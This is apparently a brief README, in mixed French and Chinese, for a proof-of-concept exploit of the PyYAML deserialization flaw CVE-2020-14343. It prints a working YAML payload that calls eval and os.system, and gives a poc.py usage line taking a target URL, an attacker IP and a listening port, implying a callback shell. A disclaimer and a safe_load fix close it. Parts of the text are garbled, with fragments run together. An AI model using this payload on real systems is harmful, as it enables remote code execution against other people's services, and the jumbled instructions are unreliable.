
CVE-2020-14343的payload
| Élément | Information |
|---|---|
| Numéro CVE | CVE-2020-14343 |
| Composant affecté | PyYAML < 5.4 |
| Type de vulnérabilité | Exécution de code à distance par désérialisation (RCE) |
| Niveau de gravité | Élevé |
Lorsque PyYAML utilise yaml.load() pour analyser des données non fiables, il ne limite pas les balises YAML dangereuses (telles que !!python/object). Un attaquant peut alors construire un contenu YAML malveillant afin d'exécuter du code Python arbitraire.
Partie centrale du payload :
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <目标URL> <攻击者IP> <监听端口>
Exemple :
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload de la cible/login pour charger et analyser le YAMLpip install requests
⚠️ Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés !
yaml.safe_load() au lieu de yaml.load()